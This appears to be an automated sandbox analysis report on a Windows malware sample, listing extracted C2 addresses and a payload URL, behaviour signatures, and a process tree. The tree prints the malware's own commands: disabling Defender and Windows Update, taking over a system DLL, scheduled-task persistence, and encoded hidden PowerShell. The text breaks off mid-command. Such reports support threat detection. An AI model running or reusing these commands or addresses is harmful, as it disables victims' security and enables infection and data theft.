Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    17-06-2022 18:38

General

  • Target

    a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe

  • Size

    207KB

  • MD5

    04abca366cc648a461c1eee9a883bd12

  • SHA1

    889beaf9e13cfdc0d103c232c9a68c3febdbafaf

  • SHA256

    a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d

  • SHA512

    59ceed9b7cd95578200f7ffd749ff60e468784d29aee4f51510cda48089b068d999bfea7cbc2232d44c4746329bf5ecea9ae4225476e314b70f8f63388408b3e

Malware Config

Extracted

Family

privateloader

C2

http://212.193.30.45/proxies.txt

http://212.193.30.29/server.txt

pastebin.com/raw/A7dSG1te

http://wfsdragon.ru/api/setStats.php

212.193.30.21

http://45.144.225.57/server.txt

85.202.169.116

http://91.241.19.125/pub.php?pub=one

http://sarfoods.com/index.php

Attributes
  • payload_url

    https://vipsofts.xyz/files/mega.bmp

Extracted

Family

nymaim

C2

37.0.8.39

31.210.20.149

212.192.241.16

Extracted

Family

socelars

C2

https://sa-us-bucket.s3.us-east-2.amazonaws.com/eurfrsa613/

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 14 IoCs
  • Modifies security service 2 TTPs 5 IoCs
  • NyMaim

    NyMaim is a malware with various capabilities written in C++ and first seen in 2013.

  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

    suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 59 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • VMProtect packed file 6 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 15 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 57 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 21 IoCs
  • NSIS installer 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies registry class 5 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe
    "C:\Users\Admin\AppData\Local\Temp\a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2408
    • C:\Users\Admin\Pictures\Adobe Films\hEJWUzdpMzOf5MHzkz5rXZLP.exe
      "C:\Users\Admin\Pictures\Adobe Films\hEJWUzdpMzOf5MHzkz5rXZLP.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:4328
    • C:\Users\Admin\Pictures\Adobe Films\2ITJQLFb1fRKK35OCQkaLI8Z.exe
      "C:\Users\Admin\Pictures\Adobe Films\2ITJQLFb1fRKK35OCQkaLI8Z.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Drops file in Program Files directory
      • Suspicious use of WriteProcessMemory
      PID:4596
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:2068
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:2284
      • C:\Users\Admin\Documents\UtFxxoBeRgcMQipR8oQNPhS7.exe
        "C:\Users\Admin\Documents\UtFxxoBeRgcMQipR8oQNPhS7.exe"
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2204
        • C:\Users\Admin\Pictures\Adobe Films\dR67sfejpm98xkNS841XLYG5.exe
          "C:\Users\Admin\Pictures\Adobe Films\dR67sfejpm98xkNS841XLYG5.exe"
          4⤵
          • Executes dropped EXE
          PID:2912
        • C:\Users\Admin\Pictures\Adobe Films\g99WJ5VR8TEJFwsXsTkJNJin.exe
          "C:\Users\Admin\Pictures\Adobe Films\g99WJ5VR8TEJFwsXsTkJNJin.exe"
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of WriteProcessMemory
          PID:4804
          • C:\Windows\SysWOW64\dllhost.exe
            dllhost kjdlskreshduehfiuwefuihuzhdsfbvnzmnnxcvjkhawiuoyrf8wer847345
            5⤵
              PID:2676
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c cmd < Questo.ppt & ping -n 5 localhost
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4420
              • C:\Windows\SysWOW64\cmd.exe
                cmd
                6⤵
                  PID:2496
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist /FI "imagename eq PSUAService.exe"
                    7⤵
                    • Enumerates processes with tasklist
                    PID:1140
                  • C:\Windows\SysWOW64\find.exe
                    find /I /N "psuaservice.exe"
                    7⤵
                      PID:4504
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /V /R "^EMjNKsUmZgpLIzWkfbdJjdfgUCiantYcrvsDCTscDINycNZcJFvRHNEgvYTipBwUfOIkwaJvyUyDClSuCMJSIiNdSeuDqljwHTQHtOzdWqLNHqLjyMEvRpjowazYkyvVHrWJxlwOz$" Sorrideva.ppt
                      7⤵
                        PID:636
                      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Nostra.exe.pif
                        Nostra.exe.pif f
                        7⤵
                        • Executes dropped EXE
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        PID:896
                    • C:\Windows\SysWOW64\PING.EXE
                      ping -n 5 localhost
                      6⤵
                      • Runs ping.exe
                      PID:1520
                • C:\Users\Admin\Pictures\Adobe Films\2ZKn48jDnGI4veQXh7HXPajY.exe
                  "C:\Users\Admin\Pictures\Adobe Films\2ZKn48jDnGI4veQXh7HXPajY.exe"
                  4⤵
                  • Executes dropped EXE
                  • Checks computer location settings
                  PID:4580
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 288
                    5⤵
                    • Program crash
                    PID:4996
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 768
                    5⤵
                    • Program crash
                    PID:3656
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 776
                    5⤵
                    • Program crash
                    PID:4452
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 800
                    5⤵
                    • Program crash
                    PID:4836
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 808
                    5⤵
                    • Program crash
                    PID:1644
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 984
                    5⤵
                    • Program crash
                    PID:4548
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 1016
                    5⤵
                    • Program crash
                    PID:2416
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 1376
                    5⤵
                    • Program crash
                    PID:1692
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c taskkill /im "2ZKn48jDnGI4veQXh7HXPajY.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\2ZKn48jDnGI4veQXh7HXPajY.exe" & exit
                    5⤵
                      PID:1908
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /im "2ZKn48jDnGI4veQXh7HXPajY.exe" /f
                        6⤵
                        • Kills process with taskkill
                        PID:4800
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 496
                      5⤵
                      • Program crash
                      PID:2156
                  • C:\Users\Admin\Pictures\Adobe Films\HB7WwFP_QCu3QwzuG59xAp0U.exe
                    "C:\Users\Admin\Pictures\Adobe Films\HB7WwFP_QCu3QwzuG59xAp0U.exe"
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:2348
                    • C:\Users\Admin\AppData\Local\Temp\7zS5033.tmp\Install.exe
                      .\Install.exe
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:3708
                      • C:\Users\Admin\AppData\Local\Temp\7zS5AD2.tmp\Install.exe
                        .\Install.exe /S /site_id "525403"
                        6⤵
                        • Executes dropped EXE
                        • Checks BIOS information in registry
                        • Checks computer location settings
                        • Enumerates system info in registry
                        PID:1988
                        • C:\Windows\SysWOW64\forfiles.exe
                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                          7⤵
                            PID:488
                            • C:\Windows\SysWOW64\cmd.exe
                              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                              8⤵
                                PID:3920
                                • \??\c:\windows\SysWOW64\reg.exe
                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                  9⤵
                                    PID:4028
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                    9⤵
                                      PID:3628
                                • C:\Windows\SysWOW64\forfiles.exe
                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                  7⤵
                                    PID:1164
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                      8⤵
                                        PID:3028
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                          9⤵
                                            PID:4120
                                          • \??\c:\windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                            9⤵
                                            • Loads dropped DLL
                                            PID:4596
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /CREATE /TN "gsvzjJiiO" /SC once /ST 00:16:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                        7⤵
                                        • Creates scheduled task(s)
                                        PID:2256
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /run /I /tn "gsvzjJiiO"
                                        7⤵
                                          PID:1780
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /DELETE /F /TN "gsvzjJiiO"
                                          7⤵
                                            PID:2240
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /CREATE /TN "bcyLPxSbowNIYSAEXo" /SC once /ST 18:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\rEOjcbxbCuqHvfnAw\sCpvQSojPTfRfLZ\UzrKuwT.exe\" Qa /site_id 525403 /S" /V1 /F
                                            7⤵
                                            • Drops file in Windows directory
                                            • Creates scheduled task(s)
                                            PID:4120
                                    • C:\Users\Admin\Pictures\Adobe Films\6vET8y_A8bX42BlhY8UaUxMU.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\6vET8y_A8bX42BlhY8UaUxMU.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      PID:1012
                                      • C:\Windows\system32\WerFault.exe
                                        C:\Windows\system32\WerFault.exe -u -p 1012 -s 348
                                        5⤵
                                        • Program crash
                                        PID:4048
                                    • C:\Users\Admin\Pictures\Adobe Films\tjoZYFEsViS0L_WZpyXQAzmU.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\tjoZYFEsViS0L_WZpyXQAzmU.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • Checks SCSI registry key(s)
                                      • Suspicious behavior: MapViewOfSection
                                      PID:1600
                                    • C:\Users\Admin\Pictures\Adobe Films\n1qMhVvLc1ozD0wTDraEdadw.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\n1qMhVvLc1ozD0wTDraEdadw.exe"
                                      4⤵
                                        PID:1140
                                        • C:\Users\Admin\Pictures\Adobe Films\n1qMhVvLc1ozD0wTDraEdadw.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\n1qMhVvLc1ozD0wTDraEdadw.exe" help
                                          5⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetWindowsHookEx
                                          PID:3180
                                      • C:\Users\Admin\Pictures\Adobe Films\oE3SzOZclk1Z_QOY7l6mFPQU.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\oE3SzOZclk1Z_QOY7l6mFPQU.exe"
                                        4⤵
                                        • Executes dropped EXE
                                        • Checks computer location settings
                                        • Suspicious use of WriteProcessMemory
                                        PID:2984
                                        • C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe
                                          "C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          PID:328
                                          • C:\Users\Admin\AppData\Local\Temp\4HFIB.exe
                                            "C:\Users\Admin\AppData\Local\Temp\4HFIB.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            PID:3916
                                            • C:\Windows\System32\conhost.exe
                                              "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\4HFIB.exe"
                                              7⤵
                                                PID:1572
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAcABzAGEAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBvAGgAdgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBxAHYAcABtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAagBvAG8AIwA+AA=="
                                                  8⤵
                                                    PID:1500
                                                    • C:\Windows\System32\Conhost.exe
                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      9⤵
                                                      • Executes dropped EXE
                                                      PID:4988
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                    8⤵
                                                      PID:4352
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop UsoSvc
                                                        9⤵
                                                        • Launches sc.exe
                                                        PID:2580
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop WaaSMedicSvc
                                                        9⤵
                                                        • Launches sc.exe
                                                        PID:4240
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop wuauserv
                                                        9⤵
                                                        • Launches sc.exe
                                                        PID:3956
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop bits
                                                        9⤵
                                                        • Launches sc.exe
                                                        PID:1036
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop dosvc
                                                        9⤵
                                                        • Launches sc.exe
                                                        PID:3124
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                                        9⤵
                                                        • Modifies registry key
                                                        PID:272
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                                        9⤵
                                                        • Modifies registry key
                                                        PID:3960
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                                        9⤵
                                                        • Modifies security service
                                                        • Modifies registry key
                                                        PID:784
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                                        9⤵
                                                        • Modifies registry key
                                                        PID:1140
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                                        9⤵
                                                        • Modifies registry key
                                                        PID:3552
                                                      • C:\Windows\system32\takeown.exe
                                                        takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                                        9⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:1340
                                                      • C:\Windows\system32\icacls.exe
                                                        icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                                        9⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:5032
                                                      • C:\Windows\system32\reg.exe
                                                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                                        9⤵
                                                        • Modifies registry key
                                                        PID:4428
                                                      • C:\Windows\system32\reg.exe
                                                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                                        9⤵
                                                        • Modifies registry key
                                                        PID:5112
                                                      • C:\Windows\system32\reg.exe
                                                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                                        9⤵
                                                        • Modifies registry key
                                                        PID:648
                                                      • C:\Windows\system32\reg.exe
                                                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                                        9⤵
                                                        • Modifies registry key
                                                        PID:3468
                                                      • C:\Windows\system32\schtasks.exe
                                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                                        9⤵
                                                          PID:564
                                                        • C:\Windows\system32\schtasks.exe
                                                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                                          9⤵
                                                            PID:4748
                                                          • C:\Windows\system32\schtasks.exe
                                                            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                                            9⤵
                                                              PID:1476
                                                            • C:\Windows\system32\schtasks.exe
                                                              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                                              9⤵
                                                                PID:3308
                                                              • C:\Windows\system32\schtasks.exe
                                                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                                                9⤵
                                                                  PID:3696
                                                                • C:\Windows\system32\schtasks.exe
                                                                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                                                  9⤵
                                                                    PID:208
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                                    9⤵
                                                                      PID:4856
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAbQBjAGUAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEARwBZAEEAZQBRAEEAagBBAEQANABBAEkAQQBCAFQAQQBIAFEAQQBZAFEAQgB5AEEASABRAEEATABRAEIAUQBBAEgASQBBAGIAdwBCAGoAQQBHAFUAQQBjAHcAQgB6AEEAQwBBAEEATABRAEIARwBBAEcAawBBAGIAQQBCAGwAQQBGAEEAQQBZAFEAQgAwAEEARwBnAEEASQBBAEEAbgBBAEUATQBBAE8AZwBCAGMAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAEkAQQBCAEcAQQBHAGsAQQBiAEEAQgBsAEEASABNAEEAWABBAEIASABBAEcAOABBAGIAdwBCAG4AQQBHAHcAQQBaAFEAQgBjAEEARQBNAEEAYQBBAEIAeQBBAEcAOABBAGIAUQBCAGwAQQBGAHcAQQBkAFEAQgB3AEEARwBRAEEAWQBRAEIAMABBAEcAVQBBAGMAZwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAdABBAEYAWQBBAFoAUQBCAHkAQQBHAEkAQQBJAEEAQgBTAEEASABVAEEAYgBnAEIAQgBBAEgATQBBAEkAQQBBADgAQQBDAE0AQQBaAHcAQgBvAEEASABnAEEAZQBnAEEAagBBAEQANABBACIAJwApACAAPAAjAHgAeQBvACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAYgBnAGUAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwBqAGMAdAAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAFEAQwAnACAALQBVAHMAZQByACAAJwBTAHkAcwB0AGUAbQAnACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAG8AdQBpACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwANABIAEYASQBCAC4AZQB4AGUAJwAgAC0